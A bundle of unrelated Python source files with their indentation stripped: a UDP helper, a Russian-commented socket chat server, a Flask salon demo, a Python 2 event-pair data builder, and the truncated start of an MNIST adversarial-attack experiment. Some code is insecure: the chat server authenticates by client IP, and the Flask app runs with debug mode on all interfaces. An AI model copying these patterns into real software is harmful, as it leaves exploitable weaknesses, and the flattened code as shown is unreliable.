(import threading -> e.g. udpReceiveThread = threading.Thread(target=self.ReadUdpNonBlocking, daemon=True))
This function keeps looping through the BLOCKING ReceiveData function and sets self.dataRX when data is received and sets received flag
This function runs in the background and updates class variables to read data later
"""
self.isDataReceived = False # Initially nothing received
while True:
data = self.ReceiveData() # Blocks (in thread) until data is returned (OR MAYBE UNTIL SOME TIMEOUT AS WELL)
self.dataRX = data # Populate AFTER new data is received
self.isDataReceived = True
# When it reaches here, data received is available
def ReadReceivedData(self):
"""
This is the function that should be used to read received data
Checks if data has been received SINCE LAST CALL, if so it returns the received string and sets flag to False (to avoid re-reading received data)
data is None if nothing has been received
:return:
"""
data = None
if self.isDataReceived: # if data has been received
self.isDataReceived = False
data = self.dataRX
self.dataRX = None # Empty receive buffer
return data
|
server.py
|
import json
import logging
import random
import socket
import threading
from typing import Dict, Union, Any
import sha3
from data_processing import DataProcessing
from server_validator import port_validation, check_port_open
END_MESSAGE_FLAG = "CRLF"
DEFAULT_PORT = 9090
# Настройки логирования
logging.basicConfig(
format="%(asctime)-15s [%(levelname)s] %(funcName)s: %(message)s",
handlers=[logging.FileHandler("./logs/server.log"), logging.StreamHandler()],
level=logging.INFO,
)
logger = logging.getLogger(__name__)
def hash(password: str) -> str:
"""Хеширование данных"""
return sha3.sha3_224(password.encode("utf-8")).hexdigest()
class Server:
def __init__(self, port_number: int) -> None:
logging.info(f"Запуск сервера..")
self.port_number = port_number
self.sock = None
self.database = DataProcessing()
self.socket_init()
# Список авторизации
self.authenticated_list = []
# Список ip, которым надо пройти регистрацию
self.reg_list = []
# Список соединений, по которым рассылаются сообщения
self.connections_list = []
self.ip2username_dict = {}
logging.info(f"Сервер инициализировался, слушает порт {port_number}")
# Ожидаем новое соединение
while True:
# Новое соединение
conn, addr = self.sock.accept()
# Добавляем новое соединение
self.connections_list.append((conn, addr))
logging.info(f"Новое соединение от {addr[0]}")
t = threading.Thread(target=self.router, args=(conn, addr))
t.daemon = True
t.start()
def send_message(self, conn, data: Union[str, Dict[str, Any]], ip: str) -> None:
"""Отправка данных"""
data_text = data
if type(data) == dict:
data = json.dumps(data, ensure_ascii=False)
data = data.encode()
conn.send(data)
logging.info(f"Сообщение {data_text} было отправлено клиенту {ip}")
def socket_init(self):
"""Инициализация сокета"""
sock = socket.socket()
sock.bind(("", self.port_number))
sock.listen(0)
# Наш сокет
self.sock = sock
def message_logic(self, conn, client_ip):
"""
Получение сообщений
"""
data = ""
while True:
# Получаем данные и собираем их по кусочкам
chunk = conn.recv(1024)
data += chunk.decode()
# Если это конец сообщения, то значит, что мы все собрали и можем отдавать данные каждому соединению
if END_MESSAGE_FLAG in data:
username = self.ip2username_dict[client_ip]
logging.info(
f"Получили сообщение {data} от клиента {client_ip} ({username})"
)
data = {"username": username, "text": data}
# Рассылка по каждому соединению
logger.info(
f"Текущее кол-во подключений к серверу: {len(self.connections_list)}"
)
for connection in self.connections_list:
current_conn, current_ip = connection
try:
self.send_message(current_conn, data, current_ip)
# Если вдруг у нас появилсоь соедиение, которое уже неактивно
except BrokenPipeError:
continue
# Обнуляемся
data = ""
# Значит пришла только часть большого сообщения
else:
logger.info(f"Приняли часть данных от клиента {client_ip}: '{data}'")
# Если вообще ничего не пришло - это конец всего соединения
if not chunk:
break
def reg_logic(self, conn, addr):
"""
Логика регистрации пользователя
"""
data = json.loads(conn.recv(1024).decode())
newuser_password, newuser_username = hash(data["password"]), data["username"]
newuser_ip = addr[0]
self.database.user_reg(newuser_ip, newuser_password, newuser_username)
logger.info(f"Клиент {newuser_ip} -> регистрация прошла успешно")
data = {"result": True}
if newuser_ip in self.reg_list:
self.reg_list.remove(newuser_ip)
logging.info(f"Удалили клиента {newuser_ip} из списка регистрации")
self.send_message(conn, data, newuser_ip)
logger.info(f"Клиент {newuser_ip}. Отправили данные о результате регистрации")
def auth_logic(self, conn, addr):
"""
Логика авторизации клиента
Запрос авторизации у нас априори меньше 1024, так что никакой цикл не запускаем
"""
user_password = hash(json.loads(conn.recv(1024).decode())["password"])
client_ip = addr[0]
# Проверяем на существование данных
auth_result, username = self.database.user_auth(client_ip, user_password)
# Если авторизация прошла успешно
if auth_result == 1:
logger.info(f"Клиент {client_ip} -> авторизация прошла успешно")
data = {"result": True, "body": {"username": username}}
if client_ip not in self.authenticated_list:
self.authenticated_list.append(client_ip)
self.ip2username_dict[client_ip] = username
logging.info(f"Добавили клиента {client_ip} в список авторизации")
# Если авторизация не удалась, но пользователь с таким ip существует
elif auth_result == 0:
logger.info(f"Клиент {client_ip} -> авторизация не удалась")
data = {"result": False, "description": "wrong auth"}
# Если пользователя с таким ip не существует, то необходима регистрация
else:
logger.info(
f"Клиент {client_ip} -> необходима предварительная регистрация в системе"
)
data = {"result": False, "description": "registration required"}
if client_ip not in self.reg_list:
self.reg_list.append(client_ip)
logging.info(f"Добавили клиента {client_ip} в список регистрации")
self.send_message(conn, data, client_ip)
logger.info(f"Клиент {client_ip}. Отправили данные о результате авторизации")
# Если была успешная авторизация - принимаем последующие сообщения от пользователя
if auth_result == 1:
self.message_logic(conn, client_ip)
def router(self, conn, addr):
"""
Роутинг в зависимости от авторизации клиента
"""
logger.info("Router работает в отдельном потоке!")
client_ip = addr[0]
# Если клиенту нужна авторизация
if client_ip in self.reg_list:
self.reg_logic(conn, addr)
# Если ip не авторизован - надо авторизовать
elif client_ip not in self.authenticated_list:
self.auth_logic(conn, addr)
# Если уже был авторизован
else:
self.message_logic(conn, client_ip)
logging.info(f"Отключение клиента {client_ip}")
self.connections_list.remove((conn, addr))
# Если клиент был в списке авторизации - удаляем его
if client_ip in self.authenticated_list:
self.authenticated_list.remove(client_ip)
print("Список соединений:")
print(self.connections_list)
logging.info(f"Удалили клиента {client_ip} из списка авторизации")
def __del__(self):
logging.info(f"Остановка сервера")
def main():
port_input = input("Введите номер порта для сервера -> ")
# Тут проверка на то, занят ли порт
port_flag = port_validation(port_input, check_open=True)
if not port_flag:
# Если порт по-умолчанию уже занят, то перебираем свободные порты
if not check_port_open(DEFAULT_PORT):
print(
f"Порт по умолчанию {DEFAULT_PORT} уже занят! Подбираем рандомный порт.."
)
stop_flag = False
while not stop_flag:
current_port = random.randint(49152, 65535)
print(f"Сгенерировали рандомный порт {current_port}")
stop_flag = check_port_open(current_port)
port_input = current_port
else:
port_input = DEFAULT_PORT
print(f"Выставили порт {port_input} по умолчанию")
server = Server(int(port_input))
if __name__ == "__main__":
main()
|
app.py
|
# import app
from flask import Flask, render_template, make_response, send_file
from flask_cors import CORS
# import custom helpers
from maplib import generate_embed
import loyaltylib as ll
app = Flask(__name__)
CORS(app)
# import declared routes
import frontenddata
@app.route('/ll')
def llfn():
ll.create_loyalty_account()
ll.retrieve_loyalty_account()
return
@app.route('/map')
def map():
location = '850 FOLSOM ST, San Francisco, CA 94107'
addresslist = {'a' : generate_embed(location)}
return render_template('map.html', addresslist=addresslist)
@app.route('/cal')
def cal():
appoint = {
'stylist': 'Bob Nguyen',
'salon': 'Salon Bobby',
'event': 'Men\'s Haircut',
'location':'850 FOLSOM ST, San Francisco, CA 94107',
'starttime':'2020-06-23 08:00:00',
'endtime':'2020-06-23 08:45:00',
}
return render_template('cal.html', appoint=appoint)
# def loop_matcher(delay):
# while(True):
# print('Matcher Automatically Run')
# handle_matcher()
# #do expired status update here
# time.sleep(delay)
# Run Server
if __name__ == "__main__":
#matcher_delay = 3600 # 1 hour in seconds
#p = Process(target=loop_matcher, args=(matcher_delay,))
#p.start()
app.run(host = '0.0.0.0', debug=True, use_reloader=False)
#p.join()
|
populate_to_pairs.py
|
from StringIO import StringIO
from sets import Set
import glob
import timeit
import gc
import gzip
from random import randint
import random
import networkx as nx
from util_class import *
from multiprocessing import Process
import os
# use EventPair and candidate class
def get_context_surrounding(sentence, dependencies, context_flag2, event_cand1, event_cand2):# relation_type == ' ==> ' or ' <== ' or ' <==> '
if context_flag2 == "tree_path":
valid_index = []
event1_index = event_cand1.keyIndex
event2_index = event_cand2.keyIndex
local_context = []
sur_context = ""
G = nx.Graph()
pobj_dict = {}
for entity in dependencies[1:-1]:
words = entity.split()
head = words[0]
tail = words[2]
#if (head == event1_index and tail == event2_index) or (tail == event1_index and head == event2_index):
# return None, None
edge = (head, tail)
G.add_edge(*edge)
if words[1] == "pobj":
pobj_dict[head] = tail
if head in [event1_index, event2_index]:
local_context.append(tail)
elif tail in [event1_index, event2_index]:
local_context.append(head)
try:
path = nx.shortest_path(G, source = event1_index, target = event2_index)
except:
return None, None
additional_context = []
for entity in dependencies[1:-1]:
words = entity.split()
head = words[0]
tail = words[2]
if head in path and words[1] in ["prep", "pobj", "aux", "auxpass", "conj", "cc", "punct"]:
additional_context.append(tail)
if words[1] == "prep" and tail in pobj_dict:
additional_context.append(pobj_dict[tail])
elif tail in path and words[1] in ["prep", "pobj", "aux", "auxpass", "conj", "cc", "punct"]:
additional_context.append(head)
valid_index = list(set(path + local_context + additional_context))
valid_index = map(int, valid_index) # change string list to int list
valid_index.sort()
valid_index = map(str, valid_index)
for i in valid_index:
if int(i) <=0 or int(i) >= len(sentence):
valid_index.remove(i)
for i in valid_index:
#if sentence[ int(i) ] == 'after' or sentence[ int(i) ] == 'before':
# return None, None
sur_context += sentence[int(i) ] + ' '
return valid_index, sur_context
elif context_flag2 == "window":
num_words_in_between = 10
num_words_before_or_after = 5
valid_index = []
event1_index = int(event_cand1.keyIndex)
event2_index = int(event_cand2.keyIndex)
sur_context = ""
#if (event2_index - num_words_in_between/2 >=1 and event1_index +num_words_in_between/2 <= len(sentence) -1 ):
for i in range( max( 1, event1_index - num_words_before_or_after ), event1_index):
valid_index.append(i)
valid_index.append(event1_index)
if (event1_index + num_words_in_between/2 <= event2_index - num_words_in_between/2):
for i in range(event1_index + 1, event1_index + num_words_in_between/2+1):
valid_index.append(i)
for i in range(event2_index - num_words_in_between/2, event2_index):
valid_index.append(i)
else:
for i in range(event1_index + 1, event2_index):
valid_index.append(i)
valid_index.append(event2_index)
for i in range(event2_index + 1, min(len(sentence) - 1, event2_index + num_words_before_or_after) + 1):
valid_index.append(i)
for i in event_cand1.allIndex:
if not int(i) in valid_index:
valid_index.append( int (i) )
for i in event_cand2.allIndex :
if not int(i) in valid_index:
valid_index.append( int (i) )
valid_index.sort()
valid_index = map(str, valid_index)
for i in valid_index:
if int(i) <=0 or int(i) >= len(sentence):
valid_index.remove(i)
for i in valid_index:
#if sentence[ int(i) ] == 'after' or sentence[ int(i) ] == 'before':
# return None, None
sur_context += sentence[int (i) ] + ' '
return valid_index, sur_context
#else:
# return None, None
def machine_learning_set(input_f1, input_f2):
train_f = open(input_f1, 'r')
test_f = open(input_f2, 'r')
train_dict = {}
for each_line in train_f:
words = each_line.split()
e1 = ""
e2 = ""
relation = ""
relation_index = -1
end_index = -1
angle_brackets_count = 0
for i, word in enumerate(words[:-1]):
if word == "==>" or word == "<==":
relation_index = i
relation = word
continue
if word in ['<', '>']:
angle_brackets_count += 1
if angle_brackets_count == 4 and word.isdigit():
end_index = i
break
e1 = " ".join(words[:relation_index])
e2 = " ".join(words[relation_index+1 : end_index])
if relation == "==>":
train_dict[e1+ ' ' + e2] = "==>"
train_dict[e2+ ' ' + e1] = "<=="
if relation == "<==":
train_dict[e1+ ' ' + e2] = "<=="
train_dict[e2+ ' ' + e1] = "==>"
test_dict = {}
for each_line in test_f:
words = each_line.split()
e1 = ""
e2 = ""
relation = ""
relation_index = -1
end_index = -1
angle_brackets_count = 0
for i, word in enumerate (words[:-1]):
if word == "==>" or word == "<==" or word == "<==>":
relation = word
relation_index = i
continue
if word in ['<', '>']:
angle_brackets_count += 1
if angle_brackets_count == 4 and word.isdigit():
end_index = i
break
e1 = " ".join(words[:relation_index])
e2 = " ".join(words[relation_index+1 : end_index])
if e1 <= e2:
pair_instance = e1 + ' ' + e2
test_dict[pair_instance] = relation
else:
pair_instance = e2 + ' ' + e1
if relation == "<==>":
test_dict[pair_instance] = "<==>"
elif relation == "<==":
test_dict[pair_instance] = "==>"
elif relation == "==>":
test_dict[pair_instance] = "<=="
"""
for ele in train_dict:
print ele
print train_dict[ele]
raw_input("continue?")
"""
print "train_dict: ", len(train_dict)
print "test_dict: ", len(test_dict)
return train_dict, test_dict
def context_exclude_event_words(sentence, event_cand1, event_cand2, valid_index):
result = ""
for i in valid_index:
if not i in event_cand1.allIndex and not i in event_cand2.allIndex:
result += sentence[int(i)] + ' '
return result
#event_pairs_readable = {}
def get_highlight_sentence(sentence, event_cand1, event_cand2):
result_list = []
for i, word in enumerate(sentence):
if str(i) == event_cand1.keyIndex or str(i) == event_cand2.keyIndex:
result_list.append('['+ word +']')
elif str(i) in event_cand1.allIndex or str(i) in event_cand2.allIndex:
result_list.append('('+ word + ')')
else:
result_list.append(word)
return " ".join(result_list)
def reverse_relation(relation):
if relation == "<==>":
return "<==>"
elif relation == "<==":
return "==>"
else:
return "<=="
def populate(iteration_i, idx, gen_flag, context_flag2, input_f1, input_f2, File, other_ratio, final_test_classifier):
print File
#global train_after_before_count, train_other_count
train_after_before_count = 0
train_other_count = 0
train_dict, test_dict = machine_learning_set(input_f1, input_f2)
"""
for ele in train_dict:
print ele
raw_input("continue?")
"""
with_folder = "with_event_words/" + iteration_i + '/'
train_before_output = open(with_folder + 'train_before_pairs' + str(idx), 'w')
train_after_output = open(with_folder + 'train_after_pairs' + str(idx), 'w')
train_other_output = open(with_folder + 'train_other_pairs' + str(idx), 'w')
track_train_before_output = open(with_folder + 'track_train_before_pairs' + str(idx), 'w')
track_train_after_output = open(with_folder + 'track_train_after_pairs' + str(idx), 'w')
track_train_other_output = open(with_folder + 'track_train_other_pairs' + str(idx), 'w')
test_other_output = open(with_folder + 'test_other_pairs' + str(idx), 'w')
track_test_other_output = open(with_folder + 'track_test_other_pairs' + str(idx), 'w')
other_sentences = open(with_folder + 'other_pairs_sentences' + str(idx), 'w')
train_after_sentences = open(with_folder + 'train_after_pairs_sentences' + str(idx), 'w')
train_before_sentences = open(with_folder + 'train_before_pairs_sentences' + str(idx), 'w')
without_folder = "without_event_words/" + iteration_i + '/'
w_train_before_output = open(without_folder + 'train_before_pairs' + str(idx), 'w')
w_train_after_output = open(without_folder +'train_after_pairs' + str(idx), 'w')
w_train_other_output = open(without_folder +'train_other_pairs' + str(idx), 'w')
w_track_train_before_output = open(without_folder +'track_train_before_pairs' + str(idx), 'w')
w_track_train_after_output = open(without_folder +'track_train_after_pairs' + str(idx), 'w')
w_track_train_other_output = open(without_folder +'track_train_other_pairs' + str(idx), 'w')
w_test_other_output = open(without_folder +'test_other_pairs' + str(idx), 'w')
w_track_test_other_output = open(without_folder +'track_test_other_pairs' + str(idx), 'w')
lines_count = 0
sentence_count = 0
random.seed(1)
#other_ratio = 500
not_events = not_events_load("../dic/words_filter.txt")
lines = open(File, 'r')
for each_line in lines:
#if lines_count >= 500000:
# break
if each_line[0][0] == '#' or not each_line.strip():
continue
words = each_line.split()
if len(words) <=2:
continue
if (words[0] == '<words>'):
sentence = words
NERs = []
dependencies = []
event_candidate_list = []
affi_dict = {}
sentence_count += 1
continue
elif (words[0] == '<NERs>'):
NERs = words
continue
elif words[0] == '<dependencies>':
dependencies = each_line.split('|')
continue
elif (words[0] == '<events_index>'):
word_group_flag = 0
word_group_member_list = []
for word in words[1:]:
if word == '<':
word_group_flag = 1
word_group_member_list.append(word)
continue
if word_group_flag == 1 and word == '>':
word_group_flag = 0
word_group_member_list.append(word)
event_cand = Candidate(gen_flag, sentence, NERs, word_group_member_list)
event_candidate_list.append(event_cand)
word_group_member_list = []
continue
if word_group_flag == 1:
word_group_member_list.append(word)
continue
for index in range(0, len(event_candidate_list) ):
for second_index in range(index+1, len(event_candidate_list) ):
event1_index = int( event_candidate_list[index].keyIndex )
event2_index = int( event_candidate_list[second_index].keyIndex )
event1_key = event_candidate_list[index].keyword
event2_key = event_candidate_list[second_index].keyword
if abs(event1_index - event2_index) > 10 or abs(event1_index - event2_index) < 2:
continue
e1 = ""
e2 = ""
e1 = event_candidate_list[index].string
e2 = event_candidate_list[second_index].string
if e1 + ' ' + e2 in train_dict:
relation = train_dict[e1 + ' ' + e2]
valid_index, sur_context = get_context_surrounding(sentence, dependencies, context_flag2, event_candidate_list[index], event_candidate_list[second_index] )
if sur_context == None:
continue
exclude_event_words = context_exclude_event_words(sentence, event_candidate_list[index], event_candidate_list[second_index], valid_index)
if len(exclude_event_words.split()) < 6:
continue
if relation == "==>":
#train_before_output.write(sur_context + e1 + ' ' + e2 + '\n')
train_before_output.write(sur_context + '\n')
pair = e1 + ' ' + relation + ' ' + e2
w_train_before_output.write(exclude_event_words + '\n')
track_train_before_output.write( pair + '\n')
w_track_train_before_output.write(pair + '\n')
train_before_sentences.write(get_highlight_sentence(sentence, event_candidate_list[index], event_candidate_list[second_index]) + '\n')
#event_pairs_readable[e1 + relation + e2] = readable_e1 + ' ' + relation + ' ' + readable_e2
if relation == "<==":
#train_after_output.write(sur_context + e1 + ' ' + e2 +'\n')
train_after_output.write(sur_context + '\n')
pair = e1 + ' ' + relation + ' ' + e2
w_train_after_output.write(exclude_event_words + '\n')
track_train_after_output.write(pair + '\n')
w_track_train_after_output.write(pair + '\n')
#event_pairs_readable[pair] = readable_e1 + ' ' + relation + ' ' + readable_e2
train_after_sentences.write(get_highlight_sentence(sentence, event_candidate_list[index], event_candidate_list[second_index]) + '\n')
lines_count += 1
train_after_before_count += 1
elif e1 + ' ' + e2 in test_dict or e2 + ' ' + e1 in test_dict:
#if random.randint(0, 9) != 0:
# continue
valid_index, sur_context = get_context_surrounding(sentence, dependencies, context_flag2, event_candidate_list[index], event_candidate_list[second_index] )
if sur_context == None:
continue
exclude_event_words = context_exclude_event_words(sentence, event_candidate_list[index], event_candidate_list[second_index], valid_index)
#if len (exclude_event_words.split() ) < 8:
# continue
reverse_flag = 0
if e1 <= e2:
pair_instance = e1 + ' ' + e2
else:
reverse_flag = 1
pair_instance = e2 + ' ' + e1
relation = test_dict[pair_instance]
test_other_output.write(sur_context + '\n')
w_test_other_output.write(exclude_event_words + '\n')
if reverse_flag == 0:
track_test_other_output.write(e1 + ' ' + relation + ' ' + e2 + '\n')
w_track_test_other_output.write(e1 + ' ' + relation + ' ' + e2 + '\n')
else:
track_test_other_output.write(e1 + ' ' + reverse_relation(relation) + ' ' + e2 + '\n')
w_track_test_other_output.write(e1 + ' ' + reverse_relation(relation) + ' ' + e2 + '\n')
other_sentences.write(get_highlight_sentence(sentence, event_candidate_list[index], event_candidate_list[second_index]) + '\n')
lines_count += 1
elif len(e1.split()) + len( e2.split()) >= 6:
random_number = random.randint(0, 20)
if random_number == 0:
if train_other_count > other_ratio * train_after_before_count:
continue
if other_sentence_filter(not_events, event1_key, event2_key) == True:
continue
valid_index, sur_context = get_context_surrounding(sentence, dependencies, context_flag2, event_candidate_list[index], event_candidate_list[second_index] )
if sur_context == None:
continue
sur_context_without_event = context_exclude_event_words(sentence, event_candidate_list[index], event_candidate_list[second_index], valid_index)
if len(sur_context_without_event.split()) < 6:
continue
#test_other_output.write(sur_context + e1 + ' ' + e2 +'\n')
train_other_output.write(sur_context + '\n')
w_train_other_output.write(sur_context_without_event + '\n')
track_train_other_output.write(e1 + ' <==> ' + e2 + '\n')
w_track_train_other_output.write(e1 + ' <==> ' + e2 + '\n')
lines_count += 1
train_other_count += 1
lines.close()
train_before_output.close()
train_after_output.close()
train_other_output.close()
track_train_before_output.close()
track_train_after_output.close()
track_train_other_output.close()
test_other_output.close()
track_test_other_output.close()
w_train_before_output.close()
w_train_after_output.close()
w_train_other_output.close()
w_track_train_before_output.close()
w_track_train_after_output.close()
w_track_train_other_output.close()
w_test_other_output.close()
w_track_test_other_output.close()
if final_test_classifier:
test_other_output = open(with_folder + 'test_other_pairs' + str(idx), 'w')
track_test_other_output = open(with_folder + 'track_test_other_pairs' + str(idx), 'w')
other_sentences = open(with_folder + 'other_pairs_sentences' + str(idx), 'w')
w_test_other_output = open(without_folder +'test_other_pairs' + str(idx), 'w')
w_track_test_other_output = open(without_folder +'track_test_other_pairs' + str(idx), 'w')
lines = open(File.replace("nyt", "wpb"), 'r')
for each_line in lines:
if each_line[0][0] == '#' or not each_line.strip():
continue
words = each_line.split()
if len(words) <=2:
continue
if (words[0] == '<words>'):
sentence = words
NERs = []
dependencies = []
event_candidate_list = []
affi_dict = {}
sentence_count += 1
continue
elif (words[0] == '<NERs>'):
NERs = words
continue
elif words[0] == '<dependencies>':
dependencies = each_line.split('|')
continue
elif (words[0] == '<events_index>'):
word_group_flag = 0
word_group_member_list = []
for word in words[1:]:
if word == '<':
word_group_flag = 1
word_group_member_list.append(word)
continue
if word_group_flag == 1 and word == '>':
word_group_flag = 0
word_group_member_list.append(word)
event_cand = Candidate(gen_flag, sentence, NERs, word_group_member_list)
event_candidate_list.append(event_cand)
word_group_member_list = []
continue
if word_group_flag == 1:
word_group_member_list.append(word)
continue
for index in range(0, len(event_candidate_list) ):
for second_index in range(index+1, len(event_candidate_list) ):
event1_index = int( event_candidate_list[index].keyIndex )
event2_index = int( event_candidate_list[second_index].keyIndex )
event1_key = event_candidate_list[index].keyword
event2_key = event_candidate_list[second_index].keyword
if abs(event1_index - event2_index) > 10 or abs(event1_index - event2_index) < 2:
continue
e1 = ""
e2 = ""
e1 = event_candidate_list[index].string
e2 = event_candidate_list[second_index].string
#elif e1 + ' ' + e2 in test_dict or e2 + ' ' + e1 in test_dict:
if other_sentence_filter(not_events, event1_key, event2_key) == True:
continue
valid_index, sur_context = get_context_surrounding(sentence, dependencies, context_flag2, event_candidate_list[index], event_candidate_list[second_index] )
if sur_context == None:
continue
exclude_event_words = context_exclude_event_words(sentence, event_candidate_list[index], event_candidate_list[second_index], valid_index)
test_other_output.write(sur_context + '\n')
w_test_other_output.write(exclude_event_words + '\n')
track_test_other_output.write(e1 + ' <==> ' + e2 + '\n')
w_track_test_other_output.write(e1 + ' <==> ' + e2 + '\n')
other_sentences.write(get_highlight_sentence(sentence, event_candidate_list[index], event_candidate_list[second_index]) + '\n')
lines.close()
test_other_output.close()
track_test_other_output.close()
other_sentences.close()
w_test_other_output.close()
w_track_test_other_output.close()
print "sentence_count: ", sentence_count
print "lines_count: ", lines_count
def populate_to_pairs_main(iteration_i, gen_flag, context_flag2, input_f1, input_f2, other_ratio, final_test_classifier):
#for File in glob.glob("../../pre_process_sentence_context/pre_process_nyt_new_*"):
# populate(iteration_i, gen_flag, context_flag2, input_f1, input_f2, File, other_ratio)
processV = []
for idx in range(0, 10):
File = "../../pre_process_sentence_context/pre_process_nyt_new_" + str(idx)
processV.append(Process(target = populate, args = (iteration_i, idx, gen_flag, context_flag2, input_f1, input_f2, File, other_ratio, final_test_classifier,)))
for idx in range(0, 10):
processV[idx].start()
for idx in range(0, 10):
processV[idx].join()
# merge files
with_folder = "with_event_words/" + iteration_i + '/'
train_before_output = open(with_folder + 'train_before_pairs', 'w')
train_after_output = open(with_folder + 'train_after_pairs', 'w')
train_other_output = open(with_folder + 'train_other_pairs', 'w')
track_train_before_output = open(with_folder + 'track_train_before_pairs', 'w')
track_train_after_output = open(with_folder + 'track_train_after_pairs', 'w')
track_train_other_output = open(with_folder + 'track_train_other_pairs', 'w')
test_other_output = open(with_folder + 'test_other_pairs', 'w')
track_test_other_output = open(with_folder + 'track_test_other_pairs', 'w')
other_sentences = open(with_folder + 'other_pairs_sentences', 'w')
train_after_sentences = open(with_folder + 'train_after_pairs_sentences', 'w')
train_before_sentences = open(with_folder + 'train_before_pairs_sentences', 'w')
without_folder = "without_event_words/" + iteration_i + '/'
w_train_before_output = open(without_folder + 'train_before_pairs', 'w')
w_train_after_output = open(without_folder +'train_after_pairs', 'w')
w_train_other_output = open(without_folder +'train_other_pairs', 'w')
w_track_train_before_output = open(without_folder +'track_train_before_pairs', 'w')
w_track_train_after_output = open(without_folder +'track_train_after_pairs', 'w')
w_track_train_other_output = open(without_folder +'track_train_other_pairs', 'w')
w_test_other_output = open(without_folder +'test_other_pairs', 'w')
w_track_test_other_output = open(without_folder +'track_test_other_pairs', 'w')
for idx in range(0, 10):
with_folder = "with_event_words/" + iteration_i + '/'
f = open(with_folder + 'train_before_pairs' + str(idx), 'r')
train_before_output.write(f.read())
f.close()
f = open(with_folder + 'train_after_pairs' + str(idx), 'r')
train_after_output.write(f.read())
f.close()
f = open(with_folder + 'train_other_pairs' + str(idx), 'r')
train_other_output.write(f.read())
f.close()
f = open(with_folder + 'track_train_before_pairs' + str(idx), 'r')
track_train_before_output.write(f.read())
f.close()
f = open(with_folder + 'track_train_after_pairs' + str(idx), 'r')
track_train_after_output.write(f.read())
f.close()
f = open(with_folder + 'track_train_other_pairs' + str(idx), 'r')
track_train_other_output.write(f.read())
f.close()
f = open(with_folder + 'test_other_pairs' + str(idx), 'r')
test_other_output.write(f.read())
f.close()
f = open(with_folder + 'track_test_other_pairs' + str(idx), 'r')
track_test_other_output.write(f.read())
f.close()
f = open(with_folder + 'other_pairs_sentences' + str(idx), 'r')
other_sentences.write(f.read())
f.close()
f = open(with_folder + 'train_after_pairs_sentences' + str(idx), 'r')
train_after_sentences.write(f.read())
f.close()
f = open(with_folder + 'train_before_pairs_sentences' + str(idx), 'r')
train_before_sentences.write(f.read())
f.close()
without_folder = "without_event_words/" + iteration_i + '/'
f = open(without_folder + 'train_before_pairs' + str(idx), 'r')
w_train_before_output.write(f.read())
f.close()
f = open(without_folder +'train_after_pairs' + str(idx), 'r')
w_train_after_output.write(f.read())
f.close()
f = open(without_folder +'train_other_pairs' + str(idx), 'r')
w_train_other_output.write(f.read())
f.close()
f = open(without_folder +'track_train_before_pairs' + str(idx), 'r')
w_track_train_before_output.write(f.read())
f.close()
f = open(without_folder +'track_train_after_pairs' + str(idx), 'r')
w_track_train_after_output.write(f.read())
f.close()
f = open(without_folder +'track_train_other_pairs' + str(idx), 'r')
w_track_train_other_output.write(f.read())
f.close()
f = open(without_folder +'test_other_pairs' + str(idx), 'r')
w_test_other_output.write(f.read())
f.close()
f = open(without_folder +'track_test_other_pairs' + str(idx), 'r')
w_track_test_other_output.write(f.read())
f.close()
train_before_output.close()
train_after_output.close()
train_other_output.close()
track_train_before_output.close()
track_train_after_output.close()
track_train_other_output.close()
test_other_output.close()
track_test_other_output.close()
w_train_before_output.close()
w_train_after_output.close()
w_train_other_output.close()
w_track_train_before_output.close()
w_track_train_after_output.close()
w_track_train_other_output.close()
w_test_other_output.close()
w_track_test_other_output.close()
# remove useless files
for idx in range(0, 10):
with_folder = "with_event_words/" + iteration_i + '/'
os.remove(with_folder + 'train_before_pairs' + str(idx))
os.remove(with_folder + 'train_after_pairs' + str(idx))
os.remove(with_folder + 'train_other_pairs' + str(idx))
os.remove(with_folder + 'track_train_before_pairs' + str(idx))
os.remove(with_folder + 'track_train_after_pairs' + str(idx))
os.remove(with_folder + 'track_train_other_pairs' + str(idx))
os.remove(with_folder + 'test_other_pairs' + str(idx))
os.remove(with_folder + 'track_test_other_pairs' + str(idx))
os.remove(with_folder + 'other_pairs_sentences' + str(idx))
os.remove(with_folder + 'train_after_pairs_sentences' + str(idx))
os.remove(with_folder + 'train_before_pairs_sentences' + str(idx))
without_folder = "without_event_words/" + iteration_i + '/'
os.remove(without_folder + 'train_before_pairs' + str(idx))
os.remove(without_folder +'train_after_pairs' + str(idx))
os.remove(without_folder +'train_other_pairs' + str(idx))
os.remove(without_folder +'track_train_before_pairs' + str(idx))
os.remove(without_folder +'track_train_after_pairs' + str(idx))
os.remove(without_folder +'track_train_other_pairs' + str(idx))
os.remove(without_folder +'test_other_pairs' + str(idx))
os.remove(without_folder +'track_test_other_pairs' + str(idx))
print "over!"
|
main.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""Trains a convolutional neural network on the MNIST dataset, then attacks it with the FGSM attack."""
from __future__ import absolute_import, division, print_function, unicode_literals
from keras.models import Sequential
from keras.layers import Dense, Flatten, Conv2D, MaxPooling2D, Dropout
import numpy as np
import pickle
from glob import glob
# from art.attacks.evasion import HopSkipJump
from hop_skip_jump import HopSkipJump
from art.estimators.classification import KerasClassifier
from art.utils import load_dataset
import tensorflow as tf
import argparse
from os.path import exists
import multiprocessing
def main(func1, func2, args):
epochs = int(args.epoch) if args.epoch else 5
accuracy_before_attack = 0
path_for_results = './results/'
force_train = True
log_name = f"{path_for_results}{func1}_{func2}_results_log.txt"
classifier_file = "{}_{}_trained_classifier".format(func1, func2)
if not glob(classifier_file) or force_train:
tf.compat.v1.disable_eager_execution()
# Read MNIST dataset
(x_train, y_train), (x_test, y_test), min_, max_ = load_dataset(str("mnist"))
# Create Keras convolutional neural network - basic architecture from Keras examples
# Source here: https://github.com/keras-team/keras/blob/master/examples/mnist_cnn.py
model = Sequential()
model.add(Conv2D(32, kernel_size=(3, 3), activation=func1, input_shape=x_train.shape[1:]))
model.add(Conv2D(64, (3, 3), activation=func2))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(128, activation=func1))
model.add(Dropout(0.5))
model.add(Dense(10, activation="softmax"))
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
classifier = KerasClassifier(model=model, clip_values=(min_, max_), use_logits=False)
classifier.fit(x_train, y_train, nb_epochs=20, batch_size=128)
# Evaluate the classifier on the test set
preds = np.argmax(classifier.predict(x_test), axis=1)
acc = np.sum(preds == np.argmax(y_test, axis=1)) / y_test.shape[0]
print("\nTest accuracy: %.2f%%" % (acc * 100))
accuracy_before_attack = acc * 100
pickle.dump(classifier, open(classifier_file, "wb"))
else:
classifier = pickle.load(open(classifier_file, "rb"))
# Craft adversarial samples with FGSM
if args.d:
